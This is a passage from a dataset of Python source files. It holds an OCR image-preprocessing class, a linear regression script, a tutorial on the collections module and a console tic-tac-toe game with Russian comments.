(w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_TRANSPARENT)\n # convert the image to an array\n self._img = cv2.cvtColor(self._img, cv2.COLOR_BGR2RGB)\n\n def black_and_white(self):\n self._img = cv2.cvtColor(self._img, cv2.COLOR_RGB2GRAY)\n (thresh, self._img) = cv2.threshold(\n self._img, 127, 255, cv2.THRESH_BINARY)\n if not self.is_white_background():\n print('black background')\n self._img = cv2.bitwise_not(self._img)\n print('threshold: ' + str(thresh))\n return cv2.GaussianBlur(self._img, (5, 5), 0)\n\n def is_white_background(self):\n white = cv2.countNonZero(self._img)\n return white >= self._img.size - white\n\n def set_image_from_bytes(self, data: bytes):\n img_stream = BytesIO(data)\n self._img = cv2.imdecode(np.fromstring(img_stream.read(), np.uint8), 1)\n\n def cv2_to_string(self) -> str:\n return cv2.imencode('.jpg', self._img)[1].tostring()\n\n def set_image_from_pil(self, img: Image):\n self._img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n\n def scale_to_optimal_line_height(self):\n line_height = 0\n i = 1\n while line_height == 0 and i < 5:\n data = self.tess_data('--psm 12 
--oem 1')\n line_height = self.get_line_height(data)\n print('line height: ' + str(line_height))\n scale = self.get_image_scale_factor(line_height, i)\n print('scale: ' + str(scale))\n self.scale_image(scale)\n i = i + 1\n return scale\n\n def unpaper(self):\n img = pillowfight.ace(self.get_image())\n img = pillowfight.unpaper_grayfilter(img)\n self.set_image_from_pil(img)\n\n def high_contrast(self):\n contrast = ImageEnhance.Contrast(self.get_image())\n self.set_image_from_pil(contrast.enhance(3))\n\n def tess_data(self, config=''):\n return ocr.image_to_data(self.get_image(), output_type=ocr.Output.DICT, config=config)\n\n def get_line_height(self, data):\n heights = self.remove_outlier_line_heights(data['height'])\n return round(median(heights))\n\n def remove_outlier_line_heights(self, line_heights, above=2.0, below=0.5):\n try:\n m = min(line_heights)\n print('minimum line height: ' + str(m))\n except StatisticsError:\n m = median(line_heights)\n print('median line height: ' + str(m))\n heights = []\n for i, h in enumerate(line_heights):\n if h < m * above and h > m * below:\n heights.append(i)\n return heights\n\n def get_image_scale_factor(self, line_height, i=1):\n if line_height == 0:\n return 0.75 ** i\n else:\n return 32 / line_height\n\n def process_image(self):\n self.high_contrast()\n self.black_and_white()\n self.unpaper()\n # self.deskew()\n\n def text_detect(self):\n td = TextDetect()\n self._img = td.text_detect(self._img)\n","sub_path":"src/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"539480438","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# loading data \n\nX = []\nY = []\n\nfor line in open('data_1d.csv'):\n x, y = line.split(',') #data in CSV file is separated by ','\n X.append(float(x))\n Y.append(float(y))\n\nX = np.array(X)\nY = np.array(Y)\n\n# plot\n\nplt.scatter(X,Y)\nplt.show()\n\n# 
Calculate a and b from equations\ndenominator = X.dot(X) - X.mean() * X.sum() \na= (X.dot(Y)- Y.mean()*X.sum())/denominator # since the sum of two vectors is equalivalent to the dot product. \nb = (Y.mean()*X.dot(X) - X.mean()*X.dot(Y))/denominator\n\n#calulate predicted Y \nYhat = a*X + b\n\n#plot\nplt.scatter(X,Y)\nplt.plot(X, Yhat)\nplt.show()\n\n# calculating r-squared\n\nd1 = Y - Yhat\nd2 = Y - Y.mean()\n\nr2 = 1 - d1.dot(d1) / d2.dot(d2) # since the sum is the equal of the dot product\nprint(\"the r-squared is: \", r2)\n","sub_path":"LR/s_lr.py","file_name":"s_lr.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"422377942","text":"### 1. Using Counter on lists\n\n# Import the Counter object from the collections module.\nfrom collections import Counter\n\n# Print the first ten items from the stations list\n# Using slice notation\nprint(stations[:10])\n\n# Create a Counter of the stations list: station_count\n# Counter creates a dict like object with the element as the key, and the number of times it occurs in the list as the value.\nstation_count = Counter(stations)\n\n# Print the station_count\nprint(station_count)\n\n\n### 2. Finding Most Common Elements\n\n# Import the Counter object from the collections module\nfrom collections import Counter\n\n# Create a Counter of the stations list: station_count\nstation_count = Counter(stations)\n\n# Use the `.most_common()` method to return the n most common elements in a list/collection\n# Find the 5 most common elements\nprint(station_count.most_common(5))\n\n\n### 3. 
Creating Dictionaries of an Unknown Structure\n\n# Create an empty dictionary: ridership\nridership ={}\n\n# Iterate over the entries (dtype=tuple)\nfor date, stop, riders in entries:\n # Check to see if date is already in the ridership dictionary\n # Use the `in` keyword to determine if the date is a key in the dictionary named \"ridership\"\n if date not in ridership:\n # Create an empty list for any missing date: key-value pair\n ridership[date] = []\n # Append the stop and riders as a tuple to the date keys list\n ridership[date].append((stop, riders))\n \n# Print the ridership for '03/09/2016'\nprint(ridership.get('03/09/2016'))\n\n\n### 4. Safely Appending to a Key's value list\n\n# Import defaultdict from the collections module.\nfrom collections import defaultdict\n\n# Create a defaultdict with a default type of list: ridership\nridership = defaultdict(list)\n\n# Iterate over the entries\nfor date, stop, riders in entries:\n # Use the stop as the key of ridership and append the riders to its value\n ridership[stop].append(riders)\n \n# Print the first 10 items of the ridership dictionary\nprint(list(ridership.items())[:10])\n\n\n### 5. Working with OrderedDictionaries\n\n# Import OrderedDict from the collections module\nfrom collections import OrderedDict\n\n# Create an OrderedDict called: ridership_date\nridership_date = OrderedDict()\n\n# Iterate over the entries\nfor date, riders in entries:\n # If a key does not exist in ridership_date, set it to 0\n if date not in ridership_date:\n ridership_date[date] = 0\n \n # Add riders to the date key in ridership_date\n ridership_date[date] += riders\n \n# Print the first 31 records\nprint(list(ridership_date.items())[:31])\n\n\n### 6. 
Powerful Ordered Popping\n\n# Use index notation to locate the first key from the list of keys in the dict \"ridership_date\"\n# Print the first key in ridership_date\nprint(list(ridership_date.keys())[0])\n\n# Use the `.popitem()` method to remove the first key-value pair in \"ridership_date\"\n# Pop the first item from ridership_date and print it\nprint(ridership_date.popitem(0))\n\n# Use index notation to return the last key from the list of keys\n# Print the last key in ridership_date\nprint(list(ridership_date.keys())[-1])\n\n# Use the `.popitem()` method to remove the last key-value pair in \"ridership_date\"\n# Pop the last item from ridership_date and print it\nprint(ridership_date.popitem(-1))\n\n\n### 7. Creating namedtuples for Storing Data\n\n# Import namedtuple from the collections module\nfrom collections import namedtuple\n\n# So freakin' awesome!!!\n# Create the namedtuple: DateDetails\n# Create a container called 'DateDetails' that accepts 3 name attribute to capture rider information.\nDateDetails = namedtuple('DateDetails', ['date', 'stop', 'riders'])\n\n# Create the empty list: labeled_entries\nlabeled_entries = []\n\n# Iterate over each tuple in \"entries\" list\nfor date, stop, riders in entries:\n # Append a new DateDetails namedtuple instance for each entry to labeled_entries\n labeled_entries.append(DateDetails(date, stop, riders))\n \n# Print the first 5 items in labeled_entries\nprint(labeled_entries[:5])\n\n\n### 8. Leveraging Attributes on namedtuples\n\n# Iterate over the first twenty items in labeled_entries\n# Each item in \"labeled_entries\" is a namedtuple object with named attributes!!! 
\nfor item in labeled_entries[:20]:\n # Print each item's stop using the attribute .stop\n print(item.stop)\n\n # Print each item's date using the attribute .date\n print(item.date)\n\n # Print each item's riders using the attribute .riders\n print(item.riders)","sub_path":"datacamp/collections_module.py","file_name":"collections_module.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"83137751","text":"a11, a12, a13, a21, a22, a23, a31, a32, a33 = 1, 2, 3, 4, 5, 6, 7, 8, 9\nl_ = [a11, a12, a13, a21, a22, a23, a31, a32, a33]\nn = 0 # счетчик ходов sdf\nwin_x = 0 # счетчик побед икса\nwin_o = 0 # счетчик побед нуля\ndraw = 0 # счетчик ничей\nс = 0 # условие: если c = 1, то нужно выходить из программы (испавляет баг)\ndef restart(): # главня функция, которая перезпускает игру\n global l_, n, a, win_x, win_o, draw, c\n global a11, a12, a13, a21, a22, a23, a31, a32, a33, q\n a = 0 # зануляем счетчики\n q = 0 # --\n c = 0\n a11, a12, a13, a21, a22, a23, a31, a32, a33 = 1, 2, 3, 4, 5, 6, 7, 8, 9\n l_ = [a11, a12, a13, a21, a22, a23, a31, a32, a33]\n n = 0 # --\n paint() # выводим игру на консоль\n play() # начинаем игру\n if a == 0 and c == 0: # если победитель не определен и команда выхода не была объявлена, то вызываем функцию ничьи\n draw_f()\ndef paint(): # выводит тело игры на консоль\n global n\n n += 1 # ход\n print(l_[0], '|', l_[1], '|', l_[2])\n print('__|___|__')\n print(l_[3], '|', l_[4], '|', l_[5])\n print('__|___|__')\n print(l_[6], '|', l_[7], '|', l_[8])\n\ndef xmove(): # добавляет х вместо введенного числа\n for k in l_:\n if k == q:\n l_[k - 1] = 'x'\ndef omove(): # добавляет о вместо введенного числа\n for h in l_:\n if h == q:\n l_[h - 1] = 'o'\n\ndef input_num(): # функция ввода числа\n global q # введенное число\n q = int(input('введите число от 1 до 9 '))\n if q not in l_:\n print(\"введите другое число\")\n input_num()\ndef win(): # функция условия 
победы\n global a\n if l_[0] == l_[1] == l_[2] or l_[0] == l_[3] == l_[6] or l_[0] == l_[4] == l_[8] or l_[1] == l_[4] == l_[7] or l_[2] == l_[5] == l_[8] or l_[3] == l_[4] == l_[5] or l_[6] == l_[7] == l_[8] or l_[6] == l_[4] == l_[2]:\n a = 1 # если какая-нибудь строка, столбец или диагональ состоит из одинаковых элементов\n else:\n a = 0 # если нет победителя\ndef play(): # функция самой игры, возвращает победителя\n global win_o, win_x, draw, c\n for i in range(9):\n if c != 0:\n break\n if a == 1: # если уже есть победитель, то в этот цикл входить нельзя\n break\n if n % 2 == 1: # если номер хода нечетный, то записываем х\n input_num() # вводим число\n xmove() # записываем х в список\n paint() # вызываем игру на консоль\n win() # вызываем значение a, которое отвечает за победу\n if a == 1: # то есть победитель есть\n win_x += 1 # даем очко победы\n print(f\"Выиграл х \\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\") # счет партии\n if input('Сыграем снова? (y/n) ') == str('y'): # после завершения игры предлагает сыграть снова\n print('Новая игра!')\n restart() # вызываем главную функцию запуска игры\n else:\n print('Выход')\n break # выходим из игры\n else: # если номер хода нечетный, то записываем о\n input_num()\n omove()\n paint()\n win()\n if a == 1:\n win_o += 1\n print(f\"Выиграл o \\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\")\n if input('Сыграем снова? (y/n) ') == str('y'):\n print('Новая игра!')\n restart()\n else:\n print('Выход')\n break\n\ndef draw_f(): # функция ничьи\n global a, win_x, win_o, draw\n if a == 0: # если победитель так и не появился, то увеличиваем колво ничей\n draw += 1\n print(f\"Ничья!\\nСчёт х:о - {win_x}:{win_o}, ничей: {draw}\")\n if input('Сыграем снова? 
(y/n) ') == str('y'):\n print('Новая игра!')\n restart()\n else:\n global c\n c = 1\n print('Выход')\nrestart() # запускает саму программу в первый раз\n","sub_path":"MAIN2.py","file_name":"MAIN2.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}